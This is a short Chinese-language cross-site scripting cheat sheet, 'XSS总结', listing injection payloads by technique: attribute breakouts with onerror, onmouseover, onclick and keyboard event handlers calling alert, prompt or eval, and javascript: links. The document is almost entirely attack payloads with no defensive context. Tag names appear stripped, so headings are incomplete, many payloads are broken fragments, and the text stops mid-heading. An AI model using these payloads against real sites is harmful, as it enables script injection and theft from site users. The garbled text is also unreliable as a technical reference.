XSS总结
一、标准语句
二、尝试大小写
三、使用标签
2、鼠标事件"x" onerror=alert(1)>
"1" onerror=eval("alert('xss')")> //图片加载错误时触发
1 onmouseover="alert(1)"> //鼠标指针移动到元素时触发
1 onmouseout="alert(1)"> //鼠标指针移出时触发
四、使用标签
1、使用href属性"https://www.qq.com">qq 'xss')>test "javascript:a" onmouseover="alert(/xss/)">aa "" onclick=alert('xss')>a "" onclick=eval(alert('xss'))>aa 1000 onmouseover=prompt('xss') y=2016>aa
五、使用标签
"name" value=""> "" onclick=alert('xss') type="text"> "name" value="" onmouseover=prompt('xss') bad=""> "name" value=""> "text" onkeydown="alert(1)"> //用户按下按键时触发 "text" onkeypress="alert(1)"> //用户按下按键时触发 "text" onkeyup="alert(1)"> //用户松开按键时触发
六、使用